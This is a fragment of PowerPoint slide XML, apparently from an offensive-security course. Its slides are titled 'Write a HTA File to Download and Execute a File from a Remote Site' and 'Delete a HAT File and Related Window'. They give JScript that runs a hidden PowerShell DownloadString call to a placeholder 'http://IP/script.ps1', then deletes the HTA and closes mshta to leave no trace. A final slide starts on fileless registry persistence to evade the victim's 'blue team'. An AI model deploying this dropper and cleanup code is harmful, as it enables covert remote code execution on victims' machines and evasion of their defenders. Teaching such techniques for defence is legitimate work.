                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('http://IP/script.ps1'))";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//Run the command, 0 is needed so that no PowerShell window will appear</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(cmd,0);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1900" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="226C10"/>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53</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Write a HTA File to Download and Execute a File from a Remote Site</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2546120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2492896"/>
            <a:ext cx="8568951" cy="4176464"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>Now that we have our script executing in memory, we need to clean up the HTA file. We can do this with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ActiveX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t> again by getting the file location, changing it away from an encoded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t> and then removing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>file:/// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>from the front of it. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0" smtClean="0"/>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>then close the window which closes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mshta.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t> leaving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t> running in the background with our downloaded code executing in memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>We use this in order to get erase the HTA file after it has executed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>b = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Scripting.FileSystemObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//Get filename and edit it so that windows can read it properly</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filename = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filename = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>decodeURI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(filename);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filename = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filename.slice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(8);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//Get a handle on the file</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>b.GetFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(filename);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//Delete it</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c.Delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//Close the MSHTA window</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="5600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="226C10"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="226C10"/>
              </a:solidFill>
            </a:endParaRPr>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54</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Delete a HAT File and Related Window</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25139046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New </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Malware Uses Windows Registry as Storage to Evade </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Detection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Ravie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Lakshmanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>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55</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2703332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7624" y="4941168"/>
            <a:ext cx="7056784" cy="936104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FB3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內容版面配置區 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Once we get on a victim’s machine, we want to make sure that we do not lose that hard-earned access, but we also want to make sure that we leave as little trace as possible for their blue team to pick up on. In order to do this, we don’t want to put anything directly onto the disk and want to keep everything running in memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>One way this can be completed is with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>registry keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
